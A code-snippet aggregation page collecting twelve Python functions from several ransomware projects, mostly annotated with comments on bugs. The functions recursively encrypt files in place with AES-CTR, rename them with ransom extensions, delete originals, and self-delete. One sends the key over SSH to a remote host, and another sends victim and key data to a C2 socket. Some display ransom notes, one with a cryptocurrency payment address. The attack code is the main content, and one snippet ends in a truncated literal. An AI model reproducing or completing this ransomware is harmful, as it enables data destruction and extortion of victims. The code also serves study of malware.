Ejemplo n.º 1
def main() -> None:
    """Entry point: decrypt when ``--decrypt <hexkey>`` is given, otherwise encrypt.

    The parsed CLI options are read as a dict; a non-empty ``decrypt`` value is
    treated as the hex-encoded AES key.  Depends on module-level names that are
    not defined in this block (``startdirs``, ``HOSTNAME``, ``USERNAME``,
    ``PASSWORD``, ``pre_decrypt``, ``post_encrypt``, ``popup`` and the
    ``discover`` / ``modify`` / ``remote`` helpers).
    """
    parser = get_parser()
    args = vars(parser.parse_args())
    decrypt = args['decrypt']

    #Decrypt mode:
    if decrypt:

        # The key is the hex string given on the command line (not stdin);
        # unhexlify raises binascii.Error on odd-length or non-hex input.
        key = binascii.unhexlify(decrypt)

        # TODO: Remove print -- the raw key is echoed to stdout, so captured
        # console output or a log of this run recovers it.
        print(binascii.hexlify(key))

        # AES-CTR with a 128-bit counter left at its default start value: the
        # keystream then depends only on the key, which is why the same
        # construction is used on both paths (default start value — confirm
        # against the installed Crypto.Util.Counter).
        ctr = Counter.new(128)
        crypt = AES.new(key, AES.MODE_CTR, counter=ctr)

        # Presumably the module-level pre_decrypt(); its body is not visible here.
        pre_decrypt()

        for currentDir in startdirs:
            for file in discover.discoverFiles(currentDir, 0):
                modify.modify_file_inplace(file, crypt.decrypt)

    #Encrypt mode
    else:

        # Generate random 128 bits key
        key = Random.get_random_bytes(16)

        # TODO: Remove print -- same key disclosure to stdout as in the
        # decrypt branch.
        print(binascii.hexlify(key))

        ctr = Counter.new(128)
        crypt = AES.new(key, AES.MODE_CTR, counter=ctr)

        for currentDir in startdirs:
            for file in discover.discoverFiles(currentDir, 0):
                modify.modify_file_inplace(file, crypt.encrypt)
        post_encrypt()

        # Send key over SSH; Notice hexlify before connect.
        # Destination and credentials are module-level globals.  Under
        # Python 3, str() of a bytes object is its repr, so the value handed
        # to remote.connect is wrapped as "b'...'" rather than bare hex.
        remote.connect(HOSTNAME, USERNAME, PASSWORD,
                       str(binascii.hexlify(key)))

        #Self destroy: removes a path derived from this script's own absolute
        # path with its last 12 characters cut off — what that resolves to
        # depends entirely on the file name.  Spawns /bin/rm via subprocess.
        self_path = os.path.abspath(__file__)
        sp.call(["/bin/rm", self_path[:-12]])
        #sp.call(["/bin/rm", self_path[:-3]])

        #Popup Message
        popup()
Ejemplo n.º 2
def main() -> None:
    """Entry point: choose the AES key from the CLI mode and run one in-place pass.

    With ``--decrypt`` the key is the literal below; otherwise it is the
    module-level ``HARDCODED_KEY``.  Both modes call ``crypt.encrypt`` — in
    CTR mode encryption and decryption are the same XOR with the keystream,
    so a second pass under the same key restores the plaintext.
    """
    parser = get_parser()
    args = vars(parser.parse_args())
    decrypt = args['decrypt']

    if decrypt:
        # 16-byte literal -> AES-128.  A key embedded in the program is
        # recoverable by anyone holding a copy of it.
        key = 'saveusfrompsgpls'

    else:
        if HARDCODED_KEY:
            key = HARDCODED_KEY
        # If HARDCODED_KEY is falsy nothing binds `key`, and AES.new below
        # raises NameError.

    # Counter with no explicit start value: the keystream is fixed per key,
    # so every run with the same key reuses the same keystream.
    ctr = Counter.new(128)
    crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
    startdirs = ['/Users/mercifulrookie/Desktop/syssec']
    #PUT YOURS PRAVIN, I USED /NARAYANAA

    for currentDir in startdirs:
        for file in discover.discoverFiles(currentDir):
            modify.modify_file_inplace(file, crypt.encrypt)

    # Dead loop: its only statement is `pass`, so nothing here touches `key`
    # (rebinding a Python str would not overwrite its bytes in memory anyway).
    for _ in range(100):
        #key = random(32)
        pass

    # No-op placeholder.
    if not decrypt:
        pass
Ejemplo n.º 3
def decrypt(key: str):
    """Decrypt the ``.Cryptsky`` files under ``START_DIR`` if *key* is accepted.

    ``check_key``, ``root`` (the tkinter parent widget) and ``START_DIR`` are
    module-level names not defined here.  Returns ``False`` when the key is
    rejected and ``None`` (implicitly) after a pass, so callers get an
    inconsistent result type.
    """
    if check_key(key):
        l = tkinter.Label(
            root,
            text="This is the correct key. \n"
            "Your files are being decrypted but it may take a while. Please wait..."
        )
        l.pack()
        # AES-CTR; the str key is encoded before use.
        ctr = Counter.new(128)
        crypt = AES.new(key.encode(), AES.MODE_CTR, counter=ctr)
        startdirs = START_DIR
        for currentDir in startdirs:
            for file in discover.discoverFiles(currentDir):
                (name, ext) = os.path.splitext(file)
                # `in` between two strings is a substring test, not equality:
                # an empty extension (no dot in the name) also matches, as
                # does any prefix such as '.C'.  Such files are XORed with the
                # keystream and renamed to `name` as well.
                if ext in '.Cryptsky':
                    try:
                        # CTR decryption is the same operation as encryption.
                        modify.modify_file_inplace(file, crypt.encrypt)
                        os.rename(file, name)
                    except IOError:
                        print("Error")
        # Artifact written by the encrypting side (presumably); its absence
        # is tolerated.
        try:
            print()
            os.remove(r'C:\Windows\Temp\winUpdater.log')
        except FileNotFoundError:
            pass
        label = tkinter.Label(
            root, text="Congratulations. Your files are now decrypted")
        label.pack()
    else:
        return False
Ejemplo n.º 4
def main():
    """Entry point (Python 2): prompt for a key with --decrypt, else generate one.

    `generate_key` is a module-level helper not visible here.  Both modes run
    `crypt.encrypt`; in CTR mode that is also the decryption operation.
    """
    parser = get_parser()
    args = vars(parser.parse_args())
    decrypt = args['decrypt']

    if decrypt:
        print '''
Ransomware!
---------------
Your files have been encrypted.


'''
        key = raw_input('Enter Your Key> ')
    else:
        key = generate_key()

    # Counter left at its default start value: keystream fixed per key.
    ctr = Counter.new(128)
    crypt = AES.new(key, AES.MODE_CTR, counter=ctr)

    # Single hard-coded mount point.
    startdirs = ['/media/bin4rygh0st/UBUNTU 19_1/']

    for currentDir in startdirs:
        for file in discover.discoverFiles(currentDir):
            modify.modify_file_inplace(file, crypt.encrypt)
        # Printed once per start dir in both modes, so the message is wrong
        # on the encrypt path.
        print("Your System has been Decrypted!!")

    # Rebinding `key` to random ints does not scrub the original key: the
    # old object is only dereferenced, never zeroed.  `randint` is presumably
    # the non-cryptographic `random` module's function.
    for _ in range(100):
        key = randint(0, 999999999999)
        pass

    # No-op placeholder.
    if not decrypt:
        pass
Ejemplo n.º 5
def pre_decrypt() -> None:
    """Prepare the trees under the module-level ``startdirs`` for decryption.

    For each path yielded by ``discover.discoverFiles(currentDir, 1)`` (the
    meaning of the second argument is not visible here): a file whose last
    dot-separated component is ``encrypted`` is renamed by dropping the
    10-character ``.encrypted`` suffix; every other yielded file is deleted.
    The ``else`` branch is the destructive step — anything discoverFiles
    returns without the suffix is removed outright.
    """
    for currentDir in startdirs:
        for file in discover.discoverFiles(currentDir, 1):
            ext = file.split('.')[-1]
            if ext == 'encrypted':
                # len('.encrypted') == 10
                os.rename(file, file[:-10])
            else:
                os.remove(file)
Ejemplo n.º 6
def main():
    """Entry point (Python 2): prompt for the key with --decrypt, else encrypt.

    The decrypt banner prints the module-level `HARDCODED_KEY` itself, so the
    key is disclosed to whoever runs it.  `random(32)` is presumably a
    module-level helper (the stdlib `random` module is not callable).
    Everything under `startdirs` is rewritten in place and renamed with the
    `.AnkurCryWare` suffix.
    """
    parser  = get_parser()
    args    = vars(parser.parse_args())
    decrypt = args['decrypt']

    if decrypt:
        print '''
AnkurCryWare!
---------------
Your files have been encrypted. This is normally the part where I would
tell you to pay a ransom, and I will send you the decryption key. However, this
is an open source project to show how easy malware can be to write and to allow
others to view what may be one of the first fully open source python ransomwares.

This project does not aim to be malicious. The decryption key can be found
below, free of charge. Please be sure to type it in EXACTLY, or you risk losing
your files forever. Do not include the surrounding quotes, but do make sure
to match case, special characters, and anything else EXACTLY!
Happy decrypting and be more careful next time!

Your decryption key is: '{}'

'''.format(HARDCODED_KEY)
        key = raw_input('Enter Your Key> ')

    else:
        # In real ransomware, this part includes complicated key generation,
        # sending the key back to attackers and more
        # maybe I'll do that later. but for now, this will do.
        if HARDCODED_KEY:
            key = HARDCODED_KEY

        else:
            key = random(32)

    # Counter left at its default start value: keystream fixed per key.
    ctr = Counter.new(128)
    crypt = AES.new(key, AES.MODE_CTR, counter=ctr)

    # change this to fit your needs.
    # '/' means the whole filesystem the process can write to.
    startdirs = ['/']

    for currentDir in startdirs:
        for file in discover.discoverFiles(currentDir):
            modify.modify_file_inplace(file, crypt.encrypt)
            os.rename(file, file+'.AnkurCryWare') # append filename to indicate crypted

    # This wipes the key out of memory
    # to avoid recovery by third party tools
    # -- it does not: rebinding the name `key` only drops a reference; the
    # original key object is not overwritten.
    for _ in range(100):
        key = random(32)
        pass

    # No-op placeholder.
    if not decrypt:
        pass
         # post encrypt stuff
         # desktop picture
         # icon, etc
    # Unterminated string literal as shown (probably truncated on extraction):
    # this line is a syntax error.
    print "Your device is encrypted by AnkurCryWare
Ejemplo n.º 7
def main():

    if PATH.is_file():
        print("Already Encrypted :)")
        window_thread = WindowThread()
        window_thread.start()
        time.sleep(10)
        safe = tkinter.Label(
            root,
            text="It is now safe to stop execution of this program. "
            "Hopefully you found the key ;)")
        safe.pack()
    else:

        key = HARDCODED_KEY
        ctr = Counter.new(128)
        crypt = AES.new(key.encode(), AES.MODE_CTR, counter=ctr)

        # change this to fit needs.
        startdirs = START_DIR

        # starts window so it appears while files are still being encrypted
        window_thread = WindowThread()
        window_thread.start()

        # encrypt files
        for currentDir in startdirs:
            for file in discover.discoverFiles(currentDir):
                try:
                    modify.modify_file_inplace(file, crypt.encrypt)
                    os.rename(
                        file, file +
                        '.Cryptsky')  # append filename to indicate crypted
                except IOError:
                    print("Error")

        # write evidence file to disk
        file = open(PATH, 'w+')
        file.write("JBOOZ encrypted this with a custom version of CryptSky. "
                   "The key for this version is: yellow submarine"
                   )  # you're welcome blue team ;)
        file.close()
        safe = tkinter.Label(
            root,
            text="It is now safe to stop execution of this program. "
            "Hopefully you found the key ;)")
        safe.pack()
        ''' # Taken out for Case Studies
Ejemplo n.º 8
def main():
    """Entry point (Python 2): prompt for the key with --decrypt, else encrypt.

    Encryption uses the module-level `HARDCODED_KEY`; if that is falsy, `key`
    is never bound and `AES.new` raises NameError.  Both modes call
    `crypt.encrypt`, which in CTR mode also performs decryption.
    """
    parser  = get_parser()
    args    = vars(parser.parse_args())
    decrypt = args['decrypt']

    if decrypt:
        # The banner has no '{}' placeholder, so .format(HARDCODED_KEY) is a
        # no-op and the key is not printed here.
        print '''
*ULTRA YEET*
---------------
Your files have been encrypted. Pay a ransom of .5 ETH to 0x8dfaC9f5E011CD1Ce1d5b7537a1c6E9703902aCA
If you do not pay this ransom you're files will be lost >:3

Your decryption key will bee given to you once proof of payment is received

'''.format(HARDCODED_KEY)
        key = raw_input('Enter Your Key> ')

    else:
        if HARDCODED_KEY:
            key = HARDCODED_KEY

        # else:
        #     key = random(32)

    # Counter left at its default start value: keystream fixed per key.
    ctr = Counter.new(128)
    crypt = AES.new(key, AES.MODE_CTR, counter=ctr)

    # change this to do what you want
    startdirs = ['/home']

    for currentDir in startdirs:
        for file in discover.discoverFiles(currentDir):
            modify.modify_file_inplace(file, crypt.encrypt)
            # Rename is disabled, so nothing marks a file as already processed.
            #os.rename(file, file+'.Cryptsky') # append filename to indicate crypted

    # This wipes the key out of memory
    # to avoid recovery by third party tools
    # -- it does not: the loop body is only `pass`.
    for _ in range(100):
        #key = random(32)
        pass

    # No-op placeholder.
    if not decrypt:
        pass
Ejemplo n.º 9
def main() -> None:
    """Entry point for the PoC: parse flags, pick a start dir, encrypt or decrypt.

    Depends on module-level names not defined here: ``parse_args``,
    ``HARDCODED_KEY``, ``SERVER_PUBLIC_RSA_KEY``, ``SERVER_PRIVATE_RSA_KEY``,
    ``extension``, ``host``, ``port``, ``getlocalip``, ``mainwindow`` and the
    ``discover`` / ``modify`` helpers.
    """
    if len(sys.argv) <= 1:
        print('[*] Ransomware - PoC\n')
        # banner()
        print('Usage: python3 main_v2.py -h')
        print('{} -h for help.'.format(sys.argv[0]))
        exit(0)

    # Parse arguments
    args = parse_args()
    encrypt = args.encrypt
    decrypt = args.decrypt
    
    # Compared against the string 'None' below, so an omitted --path has to
    # arrive as None (stringified) for the platform default to apply.
    absolute_path = str(args.path)
    
    # Force one click and comment out args above
    # absolute_path = "None"
    # encrypt = True 
    # decrypt = False
    
    if absolute_path != 'None':
        startdirs = [absolute_path]
    else:
        # Check OS: default target is a test_ransomware folder under the
        # user's home; any other platform aborts.
        plt = platform.system()
        if plt == "Linux" or plt == "Darwin":
            startdirs = [os.environ['HOME'] + '/test_ransomware']
        elif plt == "Windows":
            startdirs = [os.environ['USERPROFILE'] + '\\test_ransomware']
            # Can also hardcode additional directories
            # startdirs = [os.environ['USERPROFILE'] + '\\Desktop', 
                        # os.environ['USERPROFILE'] + '\\Documents',
                        # os.environ['USERPROFILE'] + '\\Music',
                        # os.environ['USERPROFILE'] + '\\Desktop',
                        # os.environ['USERPROFILE'] + '\\Onedrive']
        else:
            print("Unidentified system")
            exit(0)
   
    # Encrypt AES key with attacker's embedded RSA public key (RSA-OAEP,
    # base64 for transport).  The value wrapped is the module-level
    # HARDCODED_KEY, the same key used directly a few lines below.
    server_key = RSA.importKey(SERVER_PUBLIC_RSA_KEY)
    encryptor = PKCS1_OAEP.new(server_key)
    encrypted_key = encryptor.encrypt(HARDCODED_KEY)
    encrypted_key_b64 = base64.b64encode(encrypted_key).decode("ascii")

    # The wrapped key goes to stdout regardless of mode.
    print("Encrypted key " + encrypted_key_b64 + "\n")
 
    if encrypt:
        key = HARDCODED_KEY    
    if decrypt:
        # RSA Decryption function - warning that private key is hardcoded for testing purposes
        # This unwraps the value computed just above, so `key` is again
        # HARDCODED_KEY; with the private key embedded in the same program the
        # RSA layer is purely demonstrative.  With neither flag set, `key` is
        # never bound and AES.new below raises NameError.
        rsa_key = RSA.importKey(SERVER_PRIVATE_RSA_KEY)
        decryptor = PKCS1_OAEP.new(rsa_key)
        key = decryptor.decrypt(base64.b64decode(encrypted_key_b64))

    # Create AES counter and AES cipher (counter at its default start value,
    # so the keystream is fixed per key)
    ctr = Counter.new(128)
    crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
    
    # Recursively go through folders and encrypt/decrypt files.
    # The suffix check is the only "already processed" marker.
    for currentDir in startdirs:
        for file in discover.discoverFiles(currentDir):
            if encrypt and not file.endswith(extension):
                modify.modify_file_inplace(file, crypt.encrypt)
                os.rename(file, file + extension)
                print("File changed from " + file + " to " + file + extension)
            if decrypt and file.endswith(extension):
                # CTR: the same encrypt call undoes the earlier pass.
                modify.modify_file_inplace(file, crypt.encrypt)
                file_original = os.path.splitext(file)[0]
                os.rename(file, file_original)
                print("File changed from " + file + " to " + file_original)
            
    if encrypt: 
        # Exfiltrate encrypted key to C2
        # What is actually sent (see `msg`): local IP, OS name, the RSA
        # *private* and public keys, user name and host name, '$'-separated,
        # over a plain TCP socket with no TLS visible.  The wrapped AES key
        # is only shown in the window, not sent.
        def connector():
            server = socket.socket(socket.AF_INET)
            server.settimeout(10)
            try:
                # Send Key
                server.connect((host, port))
                msg = '%s$%s$%s$%s$%s$%s' % (
                    getlocalip(), platform.system(), SERVER_PRIVATE_RSA_KEY, SERVER_PUBLIC_RSA_KEY, getpass.getuser(), platform.node())
                server.send(msg.encode('utf-8'))

                # if plt == "Windows"
                # `main` here is a local of connector(); it does not rebind
                # this module-level function.
                main = mainwindow(encrypted_key_b64)
                main.mainloop()
            except Exception as e:
                # if plt == "Windows"
                # Do not send key, encrypt anyway.
                # Any failure (timeout, refused connection, ...) is swallowed;
                # `e` is never used and the socket is never closed.
                main = mainwindow(encrypted_key_b64)
                main.mainloop()
                pass
        try:
            connector()
        except KeyboardInterrupt:
            sys.exit(0)

    # This wipes the key out of memory
    # to avoid recovery by third party tools
    # -- it does not: the loop body is only `pass`.
    for _ in range(100):
        #key = random(32)
        pass
Ejemplo n.º 10
def main() -> None:
    """Entry point for the PoC: parse flags, pick a start dir, encrypt or decrypt.

    Depends on module-level names not defined here: ``parse_args``,
    ``HARDCODED_KEY``, ``SERVER_PUBLIC_RSA_KEY``, ``SERVER_PRIVATE_RSA_KEY``,
    ``extension`` and the ``discover`` / ``modify`` helpers.
    """
    if len(sys.argv) <= 1:
        print('[*] Ransomware - PoC\n')
        # banner()
        print('Usage: python3 main.py -h')
        print('{} -h for help.'.format(sys.argv[0]))
        exit(0)

    # Parse arguments
    args = parse_args()
    encrypt = args.encrypt
    decrypt = args.decrypt

    # Compared against the string 'None' below, so an omitted --path has to
    # arrive as None (stringified) for the platform default to apply.
    absolute_path = str(args.path)

    # Force one click and comment out args above
    # absolute_path = "None"
    # encrypt = True
    # decrypt = False

    if absolute_path != 'None':
        startdirs = [absolute_path]
    else:
        # Check OS: default target is a test_ransomware folder under the
        # user's home; any other platform aborts.
        plt = platform.system()
        if plt == "Linux" or plt == "Darwin":
            startdirs = [os.environ['HOME'] + '/test_ransomware']
        elif plt == "Windows":
            startdirs = [os.environ['USERPROFILE'] + '\\test_ransomware']
            # Can also hardcode additional directories
            # startdirs = [os.environ['USERPROFILE'] + '\\Desktop',
            # os.environ['USERPROFILE'] + '\\Documents',
            # os.environ['USERPROFILE'] + '\\Music',
            # os.environ['USERPROFILE'] + '\\Desktop',
            # os.environ['USERPROFILE'] + '\\Onedrive']
        else:
            print("Unidentified system")
            exit(0)

    # Encrypt AES key with attacker's embedded RSA public key (RSA-OAEP,
    # base64 for transport).  The value wrapped is the module-level
    # HARDCODED_KEY, the same key used directly a few lines below.
    server_key = RSA.importKey(SERVER_PUBLIC_RSA_KEY)
    encryptor = PKCS1_OAEP.new(server_key)
    encrypted_key = encryptor.encrypt(HARDCODED_KEY)
    encrypted_key_b64 = base64.b64encode(encrypted_key).decode("ascii")

    # The wrapped key goes to stdout regardless of mode.
    print("Encrypted key " + encrypted_key_b64 + "\n")

    if encrypt:
        # The note interpolates SERVER_PUBLIC_RSA_KEY between [begin_key] and
        # [end_key] — i.e. the public wrapping key, not the AES key.
        print("[COMPANY_NAME]\n\n"
              "YOUR NETWORK IS ENCRYPTED NOW\n\n"
              "USE - TO GET THE PRICE FOR YOUR DATA\n\n"
              "DO NOT GIVE THIS EMAIL TO 3RD PARTIES\n\n"
              "DO NOT RENAME OR MOVE THE FILE\n\n"
              "THE FILE IS ENCRYPTED WITH THE FOLLOWING KEY\n"
              "[begin_key]\n{}\n[end_key]\n"
              "KEEP IT\n".format(SERVER_PUBLIC_RSA_KEY))
        key = HARDCODED_KEY
    if decrypt:
        # # RSA Decryption function - warning that private key is hardcoded for testing purposes
        # This unwraps the value computed just above, so `key` is again
        # HARDCODED_KEY; with the private key embedded in the same program the
        # RSA layer is purely demonstrative.  With neither flag set, `key` is
        # never bound and AES.new below raises NameError.
        rsa_key = RSA.importKey(SERVER_PRIVATE_RSA_KEY)
        decryptor = PKCS1_OAEP.new(rsa_key)
        key = decryptor.decrypt(base64.b64decode(encrypted_key_b64))

    # Create AES counter and AES cipher (counter at its default start value,
    # so the keystream is fixed per key)
    ctr = Counter.new(128)
    crypt = AES.new(key, AES.MODE_CTR, counter=ctr)

    # Recursively go through folders and encrypt/decrypt files.
    # The suffix check is the only "already processed" marker.
    for currentDir in startdirs:
        for file in discover.discoverFiles(currentDir):
            if encrypt and not file.endswith(extension):
                modify.modify_file_inplace(file, crypt.encrypt)
                os.rename(file, file + extension)
                print("File changed from " + file + " to " + file + extension)
            if decrypt and file.endswith(extension):
                # CTR: the same encrypt call undoes the earlier pass.
                modify.modify_file_inplace(file, crypt.encrypt)
                file_original = os.path.splitext(file)[0]
                os.rename(file, file_original)
                print("File changed from " + file + " to " + file_original)

    # This wipes the key out of memory
    # to avoid recovery by third party tools
    # -- it does not: the loop body is only `pass`.
    for _ in range(100):
        #key = random(32)
        pass
Ejemplo n.º 11
    return parser


if __name__=="__main__":
    # Script entry: with --decrypt the key is the literal below, otherwise the
    # module-level HARDCODED_KEY.  Both paths run crypt.encrypt; in CTR mode
    # that is also the decryption operation.
    parser  = get_parser()
    args    = vars(parser.parse_args())
    decrypt = args['decrypt']

    if decrypt:
        # 16-byte literal -> AES-128; embedded in the program, hence
        # recoverable from any copy of it.
        key = 'saveusfrompsgpls'

    else:
        if HARDCODED_KEY:
            key = HARDCODED_KEY
        # If HARDCODED_KEY is falsy nothing binds `key`, and AES.new below
        # raises NameError.

    # Counter with no explicit start value: keystream fixed per key.
    ctr = Counter.new(128)
    crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
    startdirs = ['/Users/testDirectory/']
    #PLEASE INSERT DIRECTORY ACCORDING TO YOUR NEED

    for currentDir in startdirs:
        for file in discover.discoverFiles(currentDir):
            modify.modify_file_inplace(file, crypt.encrypt)

    # Dead loop: the body is only `pass`; `key` is not touched.
    for _ in range(100):
        #key = random(32)
        pass

    # No-op placeholder.
    if not decrypt:
        pass
Ejemplo n.º 12
def post_encrypt() -> None:
    """Make a ``<file>.encrypted`` copy of each discovered file, then overwrite the original.

    For every path from ``discover.discoverFiles(currentDir, 0)`` under the
    module-level ``startdirs``: ``shutil.copy2`` duplicates the file to a
    ``.encrypted`` sibling — copy2 also copies permission bits and
    timestamps, so the copy carries the source's mtime — and
    ``modify.overwrite_file_inplace`` (not visible here) then processes the
    original, presumably overwriting its contents.  If this runs after the
    in-place encryption pass, as the name suggests, the copy holds the
    ciphertext — confirm against the caller.
    """
    for currentDir in startdirs:
        for file in discover.discoverFiles(currentDir, 0):
            shutil.copy2(file, file + '.encrypted')
            modify.overwrite_file_inplace(file)